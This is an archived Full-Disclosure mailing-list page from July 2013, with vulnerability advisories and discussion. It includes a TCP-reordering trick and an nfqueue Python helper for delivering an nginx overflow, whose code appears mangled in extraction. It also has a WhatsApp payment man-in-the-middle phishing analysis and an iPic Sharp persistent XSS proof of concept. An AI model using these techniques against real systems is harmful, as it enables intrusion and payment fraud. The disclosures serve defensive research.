Re: [Full-disclosure] nginx exploit documentation, about a generic way to exploit Linux targets

2013-07-24 Thread Albert Puigsech Galicia
Hello everybody,


 Ioctl is needed to set the nginx socket blocking so another call to
write(2) will read much more memory than it is possible with the default
non-blocking connection of nginx.


This vulnerability was published recently and it seems that many exploiters
got stuck because the socket will not block because the buffer is longer
than the standard ethernet MTU, some others have found another attack
vector without that problem.

Let me to explain how we have achieved to overcome the non-blocking socket
impediment without doing so much:


When packets arriving at the TCP layer are analyzed and once determined the
sequence are immediately delivered to the upper layer of the OSI model.

Let's imagine that you want to overflow a big buffer through the network.
Normally you would execute something like;

send(sock, A….A,…);

If the size of the data is bigger than the MTU, is then splitted into multiple
packages. The destination processes the information on many smaller
packages instead of one. In summary,the read()/recv() doesn't get all the
data and the overflow is not done.

And that's what's happening on ngingx.



What we have done to prevent that packets are delivered directly to the next
layer is taking profit of TCP windows and TCP reorder: sending the first
package on the last place.

What happens is that the TCP stack will not deliver the packets to the next
layer because the information is not complete, and just wait until all
information (up to the size of the tcp window) is received to deliver it.

Then the application layer will get all the information in _the same_ read
an the overflow will happen.



Using that TCP trick, the size limitation of the overflow is the TCP window
size instead the MTU.



One easy and **dirty** way to implement this is using iptables and nfqueue,
but there are some better ones:

# iptables -A OUTPUT -p tcp -d IP --destination-port PORT -j NFQUEUE
# python nfq.py

Regards,



===/ nfq.py /===
import nfqueue
import socket
import time

data_count = 0
delayed = None

def cb(dummy, payload):
global data_count
global delayed
data = payload.get_data()
# DIRTY for first data package (not three-way-handshake)
if len(data)  60:
data_count += 1
if (data_count == 1):
delayed = payload
print data
 # Just DROP the packet and the local TCP stack will send it again because
won't get the ACK.
payload.set_verdict(nfqueue.NF_DROP)
 else:
data_count = 0


q = nfqueue.queue()
q.open()
q.bind(socket.AF_INET)
q.set_callback(cb)
q.create_queue(0)
try:
q.try_run()
except KeyboardInterrupt:
print Exiting...
q.unbind(socket.AF_INET)
q.close()
===/ nfq.py /===




-- 
Albert Puigsech Galicia
+ Mail: alb...@puigsech.com
+ Jabber: alb...@puigsech.com
+ Twitter: @apuigsech
+ Web: http://int3pids.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Where and how to report Dropbox vulnerabilities. (FUN)

2013-07-24 Thread MG


We have sent info about vulnerabilities using all forms, also direct e-mail 
supp...@dropbox.com,  we had chat….

After 2 weeks we have got answer from robot:


---
You can add a response by replying to this email.
Please be sure to reply with the same email address that you used to originally 
contact us.


Dropbox Support, Jul 24 01:44 am (PDT):

Hello,

Thank you for writing to us. Although we would like to answer all the questions 
we receive, we can not do it now.

If you need to restore multiple files, follow these steps: 
https://www.dropbox.com/help/400

Please also check our help center to find answers to frequently asked 
questions: https://www.dropbox.com/help

Sorry for the inconvenience.
Dropbox team

-

So the only way is to post all vulnerabilities to FD ?


regards,

Maciej Gojny 




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ MDVSA-2013:198 ] libxml2

2013-07-24 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2013:198
 http://www.mandriva.com/en/support/security/
 ___

 Package : libxml2
 Date: July 24, 2013
 Affected: Business Server 1.0
 ___

 Problem Description:

 Multiple vulnerabilities has been discovered and corrected in libxml2:
 
 A denial of service flaw was found in the way libxml2, a library
 providing support to read, modify and write XML and HTML files,
 performed string substitutions when entity values for external
 entity references replacement (--noent option) was requested /
 enabled during the XML file parsing. A remote attacker could provide
 a specially-crafted XML file containing an external entity expansion,
 when processed would lead to excessive CPU consumption (denial of
 service) (CVE-2013-0339). This a different flaw from CVE-2013-0338.
 
 parser.c in libxml2 before 2.9.0, as used in Google Chrome before
 28.0.1500.71 and other products, allows remote attackers to cause
 a denial of service (out-of-bounds read) via a document that ends
 abruptly, related to the lack of certain checks for the XML_PARSER_EOF
 state (CVE-2013-2877).
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0339
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2877
 https://bugzilla.redhat.com/show_bug.cgi?id=915149
 https://bugzilla.redhat.com/show_bug.cgi?id=983204
 http://advisories.mageia.org/MGASA-2013-0218.html
 ___

 Updated Packages:

 Mandriva Business Server 1/X86_64:
 4ad243c16e07e9f6850513c57cd1aa74  
mbs1/x86_64/lib64xml2_2-2.7.8-14.20120229.2.3.mbs1.x86_64.rpm
 5bae4c7471edb1a4dfe267588b8f9160  
mbs1/x86_64/lib64xml2-devel-2.7.8-14.20120229.2.3.mbs1.x86_64.rpm
 6800af0e5ca7348bf35596e57ee0  
mbs1/x86_64/libxml2-python-2.7.8-14.20120229.2.3.mbs1.x86_64.rpm
 8af9449c2a438abccd86ff5d044b2e71  
mbs1/x86_64/libxml2-utils-2.7.8-14.20120229.2.3.mbs1.x86_64.rpm 
 956fd0fbd8ccd0a705747ea469b87ff7  
mbs1/SRPMS/libxml2-2.7.8-14.20120229.2.3.mbs1.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/en/support/security/advisories/

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFR73zmmqjQ0CJFipgRAtsGAKDJR0iwQF2gTcRBeeSbrOwlZu32nQCg00k2
LR1DXtKaEMdY9lPgXZLzldg=
=bsXw
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] nginx exploit documentation, about a generic way to exploit Linux targets

2013-07-24 Thread Albert Puigsech Galicia
Hello everybody,


 Ioctl is needed to set the nginx socket blocking so another call to write(2) 
 will read much more memory than it is possible with the default non-blocking 
 connection of nginx.


This vulnerability was published recently and it seems that many
exploiters got stuck because the socket will not block because the
buffer is longer than the standard ethernet MTU, some others have
found another attack vector without that problem.

Let me to explain how we have achieved to overcome the non-blocking
socket impediment without doing so much:


When packets arriving at the TCP layer are analyzed and once
determined the sequence are immediately delivered to the upper layer
of the OSI model.

Let's imagine that you want to overflow a big buffer through the
network. Normally you would execute something like;

send(sock, A….A,…);

If the size of the data is bigger than the MTU, is then splitted into
multiple packages. The destination processes the information on many
smaller packages instead of one. In summary,the read()/recv() doesn't
get all the data and the overflow is not done.

And that's what's happening on ngingx.



What we have done to prevent that packets are delivered directly to
the next layer is taking profit of TCP windows and TCP reorder:
sending the first package on the last place.

What happens is that the TCP stack will not deliver the packets to the
next layer because the information is not complete, and just wait
until all information (up to the size of the tcp window) is received
to deliver it.

Then the application layer will get all the information in _the same_
read an the overflow will happen.



Using that TCP trick, the size limitation of the overflow is the TCP
window size instead the MTU.



One easy and **dirty** way to implement this is using iptables and
nfqueue, but there are some better ones:

# iptables -A OUTPUT -p tcp -d IP --destination-port PORT -j NFQUEUE
# python nfq.py

Regards,



===/ nfq.py /===
import nfqueue
import socket
import time

data_count = 0
delayed = None

def cb(dummy, payload):
global data_count
global delayed
data = payload.get_data()
# DIRTY for first data package (not three-way-handshake)
if len(data)  60:
data_count += 1
if (data_count == 1):
delayed = payload
print data
# Just DROP the packet and the local TCP stack will send it again
because won't get the ACK.
payload.set_verdict(nfqueue.NF_DROP)
else:
data_count = 0


q = nfqueue.queue()
q.open()
q.bind(socket.AF_INET)
q.set_callback(cb)
q.create_queue(0)
try:
q.try_run()
except KeyboardInterrupt:
print Exiting...
q.unbind(socket.AF_INET)
q.close()
===/ nfq.py /===

On 23 July 2013 19:49, king cope
isowarez.isowarez.isowa...@googlemail.com wrote:
 (see attachment)

 /Kingcope

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/



-- 
Albert Puigsech Galicia
+ Mail: alb...@puigsech.com
+ Jabber: alb...@puigsech.com
+ Twitter: @apuigsech
+ Web: file:///dev/null

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Where and how to report Dropbox vulnerabilities. (FUN)

2013-07-24 Thread MG
@Feighen
@ Malte Batram
I was trying also all these…(security… etc…)  Support via chat - requested to 
send info to support@
regards,
Maciej Gojny


Wiadomość napisana przez Feighen Oosterbroek feig...@gmail.com w dniu 24 lip 
2013, o godz. 11:56:

 Hey Maciej
 
 Not too sure if you've tried any of the security type addresses as listed by 
 rfc2142
 
 http://www.ietf.org/rfc/rfc2142.txt
 
 4.  NETWORK OPERATIONS MAILBOX NAMES
 
Operations addresses are intended to provide recourse for customers,
providers and others who are experiencing difficulties with the
organization's Internet service.
 
MAILBOXAREAUSAGE
------
ABUSE  Customer Relations  Inappropriate public behaviour
NOCNetwork Operations  Network infrastructure
SECURITY   Network SecuritySecurity bulletins or queries
 
 perhaps give them a try?
 
 Thanks and kind regards
 Feighen
 
 
 On 24 July 2013 11:29, MG v...@ariko-security.com wrote:
 
 
 We have sent info about vulnerabilities using all forms, also direct e-mail 
 supp...@dropbox.com,  we had chat….
 
 After 2 weeks we have got answer from robot:
 
 
 ---
 You can add a response by replying to this email.
 Please be sure to reply with the same email address that you used to 
 originally contact us.
 
 
 Dropbox Support, Jul 24 01:44 am (PDT):
 
 Hello,
 
 Thank you for writing to us. Although we would like to answer all the 
 questions we receive, we can not do it now.
 
 If you need to restore multiple files, follow these steps: 
 https://www.dropbox.com/help/400
 
 Please also check our help center to find answers to frequently asked 
 questions: https://www.dropbox.com/help
 
 Sorry for the inconvenience.
 Dropbox team
 
 -
 
 So the only way is to post all vulnerabilities to FD ?
 
 
 regards,
 
 Maciej Gojny 
 
 
 
 
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Where and how to report Dropbox vulnerabilities. (FUN)

2013-07-24 Thread Mysterie
Hello,

I've contact them a few time by e-mail (secur...@dropbox.com) without
problems.

https://www.dropbox.com/terms :
If you have any questions about security on our website, you can view our
Security Overview Page or contact us at secur...@dropbox.com

They even have a greetz page https://www.dropbox.com/special_thanks

Best regards,


2013/7/24 MG v...@ariko-security.com

 @Feighen

 @ Malte Batram

 I was trying also all these…(security… etc…)  Support via chat - requested 
 to send info to support@

 regards,

 Maciej Gojny



 Wiadomość napisana przez Feighen Oosterbroek feig...@gmail.com w dniu
 24 lip 2013, o godz. 11:56:

 Hey Maciej

 Not too sure if you've tried any of the security type addresses as listed
 by rfc2142

 http://www.ietf.org/rfc/rfc2142.txt

 4.  NETWORK OPERATIONS MAILBOX NAMES

Operations addresses are intended to provide recourse for customers,
providers and others who are experiencing difficulties with the
organization's Internet service.

MAILBOXAREAUSAGE
------
ABUSE  Customer Relations  Inappropriate public behaviour
NOCNetwork Operations  Network infrastructure
SECURITY   Network SecuritySecurity bulletins or queries


 perhaps give them a try?


 Thanks and kind regards

 Feighen



 On 24 July 2013 11:29, MG v...@ariko-security.com wrote:



 We have sent info about vulnerabilities using all forms, also direct
 e-mail supp...@dropbox.com,  we had chat….

 After 2 weeks we have got answer from robot:


 ---
 You can add a response by replying to this email.

 Please be sure to reply with the same email address that you used to
 originally contact us.
 --

 *Dropbox Support, Jul 24 01:44 am (PDT):*
 *
 *
 Hello,

 Thank you for writing to us. Although we would like to answer all the
 questions we receive, we can not do it now.

 If you need to restore multiple files, follow these steps:
 https://www.dropbox.com/help/400

 Please also check our help center to find answers to frequently asked
 questions: https://www.dropbox.com/help

 Sorry for the inconvenience.
 Dropbox team

 -

 So the only way is to post all vulnerabilities to FD ?


 regards,

 Maciej Gojny





 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Top Information Security Consultants to Hire -- WANTED

2013-07-24 Thread Gary Baribault
That does sound more likely

Gary  B

 On 07/23/2013 07:55 PM, Daniël W. Crompton wrote:

 I think he's collecting the names of people he can direct market to.

 D.



 On 24 July 2013 01:04, valdis.kletni...@vt.edu
 mailto:valdis.kletni...@vt.edu wrote:

 On Mon, 22 Jul 2013 21:23:08 -0500, Bob iPhone Kim said:

  BUT... turns out that about half of the people we mentioned are
 NOT looking
  for new clients.

 ironic_trombone.wav

 So are you making a list of actual top consultants, or a list of
 those people who have free time to read F-D precisely because they
 *aren't* top consultants?

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




 -- 
 blaze your trail

 -- 
 Daniël W. Crompton daniel.cromp...@gmail.com
 mailto:daniel.cromp...@gmail.com


 http://specialbrands.net/
 http://specialbrands.net/


   
 http://twitter.com/webhathttp://www.facebook.com/webhathttp://plancast.com/webhathttp://www.linkedin.com/in/redhat



 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Top Information Security Consultants to Hire -- WANTED

2013-07-24 Thread Vulnerability Lab
http://www.evolution-sec.com
International Team, Top Researchers and Consultants, Certified
Consultants, Public References and Information.

~bkm

-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: resea...@vulnerability-lab.com


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Where and how to report Dropbox vulnerabilities. (FUN)

2013-07-24 Thread Feighen Oosterbroek
Hey Maciej

Not too sure if you've tried any of the security type addresses as listed
by rfc2142

http://www.ietf.org/rfc/rfc2142.txt

4.  NETWORK OPERATIONS MAILBOX NAMES

   Operations addresses are intended to provide recourse for customers,
   providers and others who are experiencing difficulties with the
   organization's Internet service.

   MAILBOXAREAUSAGE
   ------
   ABUSE  Customer Relations  Inappropriate public behaviour
   NOCNetwork Operations  Network infrastructure
   SECURITY   Network SecuritySecurity bulletins or queries


perhaps give them a try?


Thanks and kind regards

Feighen



On 24 July 2013 11:29, MG v...@ariko-security.com wrote:



 We have sent info about vulnerabilities using all forms, also direct
 e-mail supp...@dropbox.com,  we had chat….

 After 2 weeks we have got answer from robot:


 ---
 You can add a response by replying to this email.

 Please be sure to reply with the same email address that you used to
 originally contact us.
 --

 *Dropbox Support, Jul 24 01:44 am (PDT):*
 *
 *
 Hello,

 Thank you for writing to us. Although we would like to answer all the
 questions we receive, we can not do it now.

 If you need to restore multiple files, follow these steps:
 https://www.dropbox.com/help/400

 Please also check our help center to find answers to frequently asked
 questions: https://www.dropbox.com/help

 Sorry for the inconvenience.
 Dropbox team

 -

 So the only way is to post all vulnerabilities to FD ?


 regards,

 Maciej Gojny





 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Top Information Security Consultants to Hire -- WANTED

2013-07-24 Thread Julius Kivimäki
Why am I not surprised vulnlab is the first one to post here to advertise
themselves?


2013/7/24 Vulnerability Lab resea...@vulnerability-lab.com

 http://www.evolution-sec.com
 International Team, Top Researchers and Consultants, Certified
 Consultants, Public References and Information.

 ~bkm

 --
 VULNERABILITY LABORATORY RESEARCH TEAM
 DOMAIN: www.vulnerability-lab.com
 CONTACT: resea...@vulnerability-lab.com


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Phishing Google Wallet and Paypal by abusing WhatsApp

2013-07-24 Thread Curesec Research Team
Hi List,

please find the vulnerability description within this post.

Cheers,
 Curesec Research Team

Reference:
https://cureblog.de/2013/07/phishing-google-wallet-and-paypal-by-abusing-whatsapp/


Phishing Google Wallet and Paypal by abusing WhatsApp

-=Introduction=-

WhatsApp is one of the most common used tools aka ‘Apps’ on
Smarphone-Devices with access to wireless networks or a so called
Data-’Flatrate’. By using the internet link to communicate, people do
not have to pay any extra fees for sending a text-message somewhere,
even if the receiver is in another country.

WhatsApp is available for almost every architecture on the market. The
program exists for Nokia, Blackberry, Android and iOS. It is available
here: https://www.whatsapp.com. This post will focus on the version for
android.

The app is free for one-year in Android devices. After that time the
user has to buy a yearly license. The application provides 3 methods of
payment:

google wallet
paypal
payment link.

They can be selected via Menu-Settings-Account-Payment Info.

-=Bug=-

Google-wallet and Paypal payments work in the same way. When selecting
it, WhatsApp opens an in-app browser and contacts its main server
www.whatsapp.com with the request:

/payments/google.php?phone=cksum=request
checksumsku=1lg=enlc=US

or

/payments/paypal.php?phone=cksum=request
checksumsku=1lg=enlc=US

Responding to this request the browser gets redirected to the proper
checkout service.
The payment link option seems to be currently not working, i.e., nothing
happens.

-=Attacks=-

Even tough the communication with the payment systems is HTTPS secured,
the initial contact with the main server www.whatsapp.com is NOT, as we
can see in Wireshark logs:

GET
/payments/google.php?phone=xcksum=checksumsku=1lg=enlc=US
HTTP/1.1
Host: www.whatsapp.com
Accept-Encoding: gzip
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.7)
Cookie: __utmmobile=0
Accept:application/xml,application/xhtml+xml,text/html;
q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7

After Whatsapp sent this unencrypted request, it will receive the
following answer.

HTTP/1.1 200 OK
X-Powered-By: PHP/5.4.7
Content-type: text/html
Transfer-Encoding: chunked
Date: Mon, 10 May 2013 05:34:36 GMT
Server: lighttpd/1.4.31
5e4

html
head
meta name=HandheldFriendly content=true/
meta http-equiv=Content-Type content=text/html; charset=utf-8 /
titleWhatsApp Messenger payment/title
/head
body onLoad=document.getElementById('google').submit()
pPlease wait.../p
form id=google method=POST action=https://checkout.google.com
api/checkout/v2/checkoutForm/Merchant/xx
accept-charset=utf-8
input type=hidden name=shopping-cart.items.item-1.item-name
value=One year of WhatsApp service for phone XXX/
input type=hidden name=shopping-cart.items.item-1.item-description
value=WhatsApp Messenger/
input type=hidden name=shopping-cart.items.item-1.merchant-item-id
value=1/
input type=hidden
name=shopping-cart.items.item-1.merchant-private-item-data
value=XXX/
input type=hidden name=shopping-cart.items.item-1.unit-price
value=0.99/
input type=hidden
name=shopping-cart.items.item-1.unit-price.currency value=USD/
input type=hidden name=shopping-cart.items.item-1.quantity value=1/
input type=hidden
name=shopping-cart.items.item-1.digital-content.display-disposition
value=OPTIMISTIC/
input type=hidden
name=shopping-cart.items.item-1.digital-content.email-delivery
value=true/
input type=hidden
name=checkout-flow-support.merchant-checkout-flow-support.continue-shopping-url
value=http://www.whatsapp.com/payments/success.php/
input type=hidden name=_charset_ /
/form
/body
/html
0

This means an attacker could intercept the first request via a suitable
man-in-the-middle attack and successfully redirect the user to any
Webpage when the user is trying to buy Whatsapp credit. To gain
useraccounts the attacker could setup a fake Google-Wallet or Paypal
Systems page to harvest user accounts. It might even be possible to
gather directly money through this, for instance let the user pay the
0,99 cents via Google Wallet or Paypal to the account of the attacker.

Besides an attacker could forward some other content like a webpage with
a new apk necessary for using google-wallet or paypal, like the
(in)-famous Zitmo Trojan did at visiting a Bankingsite and spending
users some extra “Security”-Features.

-=Practical abuse of the bug=-

As buying the credit only happens one time per year the attack itself is
quite uncommon to be practical for a huge misuse as the attacker needs
to be in control of the wireless or gsm network to intercept and
redirect the traffic.

-=Affected Versions=-

2.9.6447 to 2.10.751 (latest as of 2013 July 2)


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html

[Full-disclosure] [Security-news] SA-CONTRIB-2013-060 - Scald - Cross Site Scripting (XSS)

2013-07-24 Thread security-news
View online: https://drupal.org/node/2049415

  * Advisory ID: DRUPAL-SA-CONTRIB-2013-060
  * Project: Scald [1] (third-party module)
  * Version: 6.x, 7.x
  * Date: 2013-July-24
  * Security risk: Moderately critical [2]
  * Exploitable from: Remote
  * Vulnerability: Cross Site Scripting

 DESCRIPTION  
-

This module enables you to handle media assets (atoms) in Drupal with a
Views-based library, drag and drop interface and manage content
attribution/licensing/distribution.

The module doesn't sufficiently filter atom properties such as the atom title
when outputting atoms, thereby exposing a Cross Site Scripting (XSS)
vulnerability.

This vulnerability is mitigated by the fact that an attacker must have a role
with the permission to create atoms and the Scald Flash module or the
resource management feature (in the MEE submodule) must be enabled.


 CVE IDENTIFIER(S) ISSUED  


  * /A CVE identifier [3] will be requested, and added upon issuance, in
accordance with Drupal Security Team processes./

 VERSIONS AFFECTED  
---

  * Scald 6.x-1.x versions prior to 6.x-1.0-beta3.
  * Scald 7.x-1.x versions prior to 7.x-1.1.

Drupal core is not affected. If you do not use the contributed Scald [4]
module, there is nothing you need to do.

 SOLUTION  


Install the latest version:

  * If you use the Scald module for Drupal 6.x, upgrade to Scald 6.x-1.0-beta3
[5]
  * If you use the Scald module for Drupal 7.x, upgrade to Scald 7.x-1.1 [6]

Also see the Scald [7] project page.

 REPORTED BY  
-

  * Klaus Purer [8] of the Drupal Security Team

 FIXED BY  


  * Franck Deroche [9] the module maintainer
  * Hai-Nam Nguyen [10] the module maintainer

 COORDINATED BY  
--

  * Klaus Purer [11] of the Drupal Security Team

 CONTACT AND MORE INFORMATION  


The Drupal security team can be reached at security at drupal.org or via the
contact form at http://drupal.org/contact [12].

Learn more about the Drupal Security team and their policies [13], writing
secure code for Drupal [14], and securing your site [15].


[1] http://drupal.org/project/scald
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/scald
[5] https://drupal.org/node/2049239
[6] https://drupal.org/node/2049251
[7] http://drupal.org/project/scald
[8] http://drupal.org/user/262198
[9] http://drupal.org/user/59710
[10] http://drupal.org/user/210762
[11] http://drupal.org/user/262198
[12] http://drupal.org/contact
[13] http://drupal.org/security-team
[14] http://drupal.org/writing-secure-code
[15] http://drupal.org/security/secure-configuration

___
Security-news mailing list
security-n...@drupal.org
Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in the Cisco Video Surveillance Manager

2013-07-24 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Cisco Security Advisory: Multiple Vulnerabilities in the Cisco Video 
Surveillance Manager

Advisory ID: cisco-sa-20130724-vsm

Revision 1.0

For Public Release 2013 July 24 16:00  UTC (GMT)

+-

Summary
===

The Cisco Video Surveillance Manager (VSM) allows operations managers and 
system integrators to build customized video surveillance networks to meet 
their needs. Cisco VSM provides centralized configuration, management, display, 
and control of video from Cisco and third-party surveillance endpoints. 
Multiple security vulnerabilities exist in versions of Cisco VSM prior to 
7.0.0, which may allow an attacker to gain full administrative privileges on 
the system.

More information on Cisco VSM can be found at 
http://www.cisco.com/en/US/products/ps10818/index.html.

Cisco has released software updates that address these vulnerabilities. 
Workarounds that mitigate these vulnerabilities are available.

This advisory is available at the following link: 
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130724-vsm
-BEGIN PGP SIGNATURE-
Version: GnuPG/MacGPG2 v2.0.19 (Darwin)

iF4EAREKAAYFAlHv3iUACgkQUddfH3/BbTrV2wD8DLMSP/vWdottEKUxbtuV1oQ+
tq7vz7Be9Q5mKn74ZsoA/1R7qkDcrmeKQTuBky432DtScteMcfbys0vD9pcQYoqU
=HloY
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] iPic Sharp v1.2.1 Wifi iOS - Persistent Foldername Web Vulnerability

2013-07-24 Thread Vulnerability Lab
Title:
==
iPic Sharp v1.2.1 Wifi iOS - Persistent Foldername Web Vulnerability


Date:
=
2013-07-24


References:
===
http://www.vulnerability-lab.com/get_content.php?id=1031


VL-ID:
=
1031


Common Vulnerability Scoring System:

3.6


Introduction:
=
iPic Sharp Pro is a photos/video management app,can manage your photos/video 
into folders and subfolders, 
Compress photos/folders into zip file and extract photos from a compressed 
(zip/rar), Use password protect 
your files, and transfer photos/(zip/rar) between computer and your devices.

Password protect
Password lock entire app
Password lock wifi
Password lock individual folder

View Photos
Photo gallery
Slide show
Thumbnail preview
View Photos app

File Sharing
USB File Sharing via iTunes
Http File Sharing via WiFi, Support Safari, chrome, firefox and IE6/7/8/9 
(Slide show )
Chrome and Firefox Supported upload multiple files
Email multiple files, folder Supported

Archives
Extract photos from a compressed zip/rar file
Compression files/folders to zip file
Archives rename, email, batch

( Copy of the Homepge: 
https://itunes.apple.com/en/app/ipic-sharp-pro/id449820537 )


Abstract:
=
The Vulnerability Laboratory Research Team discovered a persistent input 
validation vulnerability in the iPic Sharp v1.2.1 application (Apple iOS - iPad 
 iPhone).


Report-Timeline:

2013-07-24:Public Disclosure (Vulnerability Laboratory)


Status:

Published


Affected Products:
==
Apple AppStore
Product: iPic Sharp - Application 1.2.1


Exploitation-Technique:
===
Local


Severity:
=
Medium


Details:

A persistent input validation web vulnerability is detected  in the iPic Sharp 
v1.2.1 application (Apple iOS - iPad  iPhone).
The bug allows an attacker (remote) to implement/inject malicious script code 
to the application side (persistent) of the device.

The vulnerability is located in the index file dir listing module of the 
web-server (http://localhost:41493) when processing to 
request via POST method local manipulated `album folder names`. The persistent 
script code will be executed in the main 
index file dir listing module when the service lists the new malicious injected 
foldername as separate item. Attackers can locally 
change the normal album names inside of the apple iOS device (ipad or iphone) 
to execute the code when a user is requesting the 
mobile application index with the foldername listing.

Exploitation of the persistent web vulnerability requires low user interaction 
and a local privilege application  device account.
Successful exploitation of the vulnerability can lead to persistent session 
hijacking (customers), account steal via persistent 
web attacks, persistent phishing or stable (persistent) certificate mail 
notification context manipulation.

Vulnerable Application(s):
[+] iPic Sharp v1.2.1 - ITunes or AppStore 
(Apple)

Vulnerable Module(s):
[+] Index

Vulnerable Parameter(s):
[+] foldername

Affected Module(s):
[+] Index File Dir - Foldername Listing


Proof of Concept:
=
The persistent input validation web vulnerability can be exploited by local 
attackers with low user interaction and no privilege 
mobile web application user account. For demonstration or reproduce ...

PoC: Root Parameter

{'isSecret'0,'isSame'1,'isDelete'0,'guid''136'','albumtype'137,'items'[{'PhotoSharp_System_Photo'[{'name''Camera
 
Roll','isdir'1,'id'0,'filesize'0,'modDate''','url''(null)','section''PhotoSharp_System_Photo','localsection''System
 Photos','ispass'0}]},
{'PhotoSharp_Local_Photo'[{'name''.[PERSISTENT INJECTED SCRIPT 
CODE!]','isdir'1,'id'0,'filesize'102,'modDate''2013-07-20 
145009','url''','section''PhotoSharp_Local_Photo','localsection''Local 
Photos','ispass'0}]},
{'PhotoSharp_Local_Document'[{'name''PhotoSharp_Local_Document','isdir'1,'id'0,'filesize'0,'modDate''','url'''
,'section''PhotoSharp_Local_Document','localsection''[PERSISTENT INJECTED 
SCRIPT CODE!]','ispass'0}]}],'dir''','dirlocal'''}


PoC: Source

trtd class=photoTd classname=photoTddiv id=PhotoSharp_System_Photo_0 
class=watermarkStart 
classname=watermarkStarta 
href=javascript:loadDir('%2Fu%2FCamera%2520Roll%3FisSystem%3D1','PhotoSharp_System_Photo_0',
'%2Fu%2FCamera%2520Roll');img 
src=iPic%20Sharp_files/Camera%2520Roll_75_75.jpg 
id=img_PhotoSharp_System_Photo_0 
realurl=(null) class=logoStart classname=logoStart/aspan 
class=spanAlbum classname=spanAlbumCamera Roll/span/div/td
td class=photoTd classname=photoTddiv id=PhotoSharp_Local_Photo_0 
class=watermarkStart classname=watermarkStart
a 
href=javascript:loadDir('%2Fu%2F.Default%2520Album%3FisSystem%3D0','PhotoSharp_Local_Photo_0','%2Fu%2F.[PERSISTENT
 INJECTED SCRIPT CODE!]');
img src=[PERSISTENT INJECTED SCRIPT 

Re: [Full-disclosure] Top Information Security Consultants to Hire -- WANTED

2013-07-24 Thread Bob iPhone Kim
OK... guys...

